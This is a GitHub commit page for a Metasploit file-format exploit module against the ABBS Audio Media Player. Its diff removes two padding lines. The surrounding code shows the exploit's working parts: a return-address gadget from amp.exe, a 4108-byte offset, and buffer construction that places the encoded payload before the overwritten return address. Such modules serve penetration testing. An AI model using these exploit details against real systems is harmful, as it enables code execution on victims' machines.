Skip to content

Commit

Permalink
remove additional junk, tested and not needed
Browse files Browse the repository at this point in the history
  • Loading branch information
modpr0be committed Jul 2, 2013
1 parent 9b8bfa6 commit 2e53984
Showing 1 changed file with 0 additions and 2 deletions.
2 changes: 0 additions & 2 deletions modules/exploits/windows/fileformat/abbs_amp_lst.rb
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,6 @@ def initialize(info = {})
{
'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
'Offset' => 4108,
'Max' => 4500
}
]
],
Expand All @@ -67,7 +66,6 @@ def exploit
buffer = payload.encoded
buffer << rand_text(target['Offset'] - (payload.encoded.length))
buffer << [target.ret].pack('V')
buffer << rand_text(target['Max'] - buffer.length)

file_create(buffer)
end
Expand Down

0 comments on commit 2e53984

Please sign in to comment.